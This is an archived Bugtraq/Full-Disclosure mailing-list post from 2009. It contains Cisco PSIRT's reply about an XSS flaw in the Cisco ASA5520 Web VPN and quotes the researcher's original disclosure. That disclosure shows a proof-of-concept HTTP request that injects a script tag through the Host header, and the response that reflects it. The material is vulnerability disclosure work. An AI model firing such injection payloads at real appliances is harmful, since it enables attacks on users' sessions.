lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Fri, 24 Apr 2009 10:45:10 -0400
From: "Mark-David McLaughlin (marmclau)" <marmclau@...co.com>
To: "Bugs NotHugs" <bugsnothugs@...il.com>,
	"bugtraq" <bugtraq@...urityfocus.com>,
	"fd" <full-disclosure@...ts.grok.org.uk>
Subject: RE: Cisco ASA5520 Web VPN Host Header XSS

This is the Cisco PSIRT response to an issue discovered and reported to
Cisco by Bugs NotHugs regarding a cross-site scripting vulnerability in
the Cisco Adaptive Security Appliance (ASA) clientless SSL VPN feature.
Cisco PSIRT greatly appreciates the opportunity to work with researchers
on security vulnerabilities, and welcomes the opportunity to review and
assist in product reports. PSIRT would like to thank Bugs NotHugs for
reporting this issue to us. 

Cisco has release an IntelliShield Alert on this vulnerability, which is
available at:
http://tools.cisco.com/security/center/viewAlert.x?alertId=17950.  This
and other IntelliShield Alerts are available off the Cisco Security
Center (www.cisco.com/security). 

Cisco is currently patching this vulnerability as Cisco bug ID
CSCsy82093 and the fixes will be available in 8.0.3.31, 8.1.2.22, and
8.2.0. These images will soon be available for download at either
http://www.cisco.com/cgi-bin/tablebuild.pl/asa or
http://www.cisco.com/cgi-bin/tablebuild.pl/asa-interim. 

To check on the latest versions with fixed releases please consult the
Cisco Bug Toolkit
http://tools.cisco.com/Support/BugToolKit/action.do?hdnAction=searchBugs
.

-----Original Message-----
From: Bugs NotHugs [mailto:bugsnothugs@...il.com] 
Sent: Tuesday, March 31, 2009 6:18 AM
To: bugtraq; fd
Subject: Cisco ASA5520 Web VPN Host Header XSS

- Cisco ASA5520 Web VPN Host Header XSS

- Description

Cross-site scripting.

- Product

Cisco, ASA5520, IOS 7.2(2)22

- PoC

Modified request:

POST /+webvpn+/index.html HTTP/1.1
Host: "'><script>alert('BugsNotHugs')</script><meta httpequiv=""
content='"www.owasp.org
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://198.133.219.23/+webvpn+/index.html
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/1.3 (compatible; MSIE 3.0; Windows 3.11; .NET CLR
1.1.1032)
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: webvpnlogin=1
Content-Length: 66

username=psirt&password=easy&Login=Login&next=&tgroup=&tgcookieset=


Response:

HTTP/1.1 200 OK
Server: Virata-EmWeb/R6_2_0
Content-Type: text/html
Cache-Control: max-age=0
Set-Cookie: webvpn=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/
Set-Cookie: webvpnlogin=1
Content-Length: 5556

<html>
<!--
  Copyright (c) 2004, 2005 by Cisco Systems, Inc.
  All rights reserved.
 -->
<head>


<META http-equiv="PICS-Label" content='(PICS-1.1
"http://www.rsac.org/ratingsv01.html" l gen true comment "RSACi North
America Server" for
"http://"'><script>alert('BugsNotHugs')</script><meta httpequiv=""
content='"www.owasp.org/+webvpn+/index.html" on
"2000.11.02T23:36-0800" r (n 0 s 0 v 0 l 0))'>

<meta http-equiv="Window-target" content="_top">
<title>WebVPN Service</title>


- Solution

None

- Timeline

2007-09-17: Vulnerability Discovered
2008-02-15: Disclosed to Vendor (auto-reply)
2009-04-02: Disclosed to Public (XSS is so 1999)

-- 

BugsNotHugs
Shared Vulnerability Disclosure Account

Powered by blists - more mailing lists